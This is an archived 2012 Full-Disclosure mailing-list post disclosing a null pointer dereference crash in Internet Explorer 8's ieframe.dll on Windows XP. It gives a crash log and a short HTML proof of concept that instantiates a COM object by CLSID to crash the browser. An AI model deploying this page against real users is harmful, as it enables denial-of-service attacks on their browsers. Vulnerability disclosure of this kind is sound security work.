lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CADe7mMdhBJmuaZ8gtn8qc8-frZ3DNgECH001pixPNpfhaUqeZQ@mail.gmail.com>
Date: Sun, 19 Aug 2012 03:59:07 -0700
From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Windows Internet Explorer(ieframe.dll) null
	pointer dereference

Exploit Title: Windows Internet Explorer(ieframe.dll) null pointer dereference
Crash:http://img221.imageshack.us/img221/273/nullt.png
Date: 2012-08-19
Author: coolkaveh
coolkaveh@...ketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://www.microsoft.com/
Version: 8.00.6001.23345
Tested on: windows XP SP3 ENG
=====================================================================================================
COM Object Filename : C:\WINDOWS\system32\ieframe.dll
Major Version       : 8
Minor Version       : 0
Build Number        : 6001
Revision Number     : 23345
Product Version     : 8.00.6001.23345
Product Name        : Windows® Internet Explorer
Company Name        : Microsoft Corporation
Legal Copyright     : © Microsoft Corporation. All rights reserved.
Comments            : not found
File Description    : Internet Explorer
File Version        : 8.00.6001.23345 (longhorn_ie8_ldr.120423-2015)
Internal Name       : IEFRAME.DLL
=====================================================================================================
***     IE Exception      ***
*****************************************************************************************************
EXCEPTION ACCESS VIOLATION(0xc0000005): instruction address:
0x3E51FD30, invalid read from 0x00000000
*****************************************************************************************************
=====================================================================================================
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
  <title>coolkaveh</title>
  <meta name="GENERATOR" content="Evrsoft First Page">
</head>

<body bgcolor="black">
  <p><font style="BACKGROUND-COLOR: #000000" color="#FFFFFF">&nbsp;</font></p>

  <p align="center"><font style="BACKGROUND-COLOR: #000000"
color="#FFFFFF"><font color="#FFFFFF"><font><font
style="BACKGROUND-COLOR: #000000"><strong><font size=
  "5">|------------------------------------------|</font></strong></font></font></font></font></p>

  <p align="center"><strong><font color="#FFFFFF" size="5"><font
style="BACKGROUND-COLOR: #000000"><font color="#FF0000">Awsome
coolkaveh</font></font></font></strong></p>

  <p align="center"><strong><font style="BACKGROUND-COLOR: #000000"
color="#FFFFFF"
size="5">|------------------------------------------|</font></strong></p><object
style=
  "WIDTH: 100px; HEIGHT: 350px" id="TestObj"
classid="CLSID:{07C45BB1-4A8C-4642-A1F5-237E7215FF66}">
    </object>
</body>
</html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ